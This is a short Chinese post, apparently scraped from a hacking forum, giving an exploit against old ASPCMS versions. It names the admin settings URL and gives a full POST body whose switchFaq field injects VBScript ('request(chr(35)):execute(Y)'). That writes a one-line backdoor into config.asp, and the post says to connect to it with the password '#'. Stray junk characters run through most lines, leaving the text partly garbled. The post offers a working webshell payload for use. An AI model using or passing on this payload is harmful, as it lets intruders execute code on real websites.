老的ASPCMS版本的秒杀拿SHELL漏洞( U m2 c( [) H* O6 O
5 z8 P3 L2 ?! M. x 找到后台。。。然后4 t* L3 j3 d x, z, m( e
6 k( f& _2 |+ L
/admin/_system/AspCms_SiteSetting.asp?action=saves k) J9 X" o {
3 V$ B5 d& s$ K' c8 `& z1 x1 O5 L直接POST
- U5 @9 a( Z, V6 j* A/ X, Z# r6 Y 4 v' u$ `0 k! B, G$ B' {
runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=1
' ?# X5 [* h) C Y: A- t( k4 J, R o / l/ _, C' v( ^/ Z. \1 T: s8 p
再连接配置文件config.asp 密码为#
4 g9 l9 R3 N7 S! j4 E |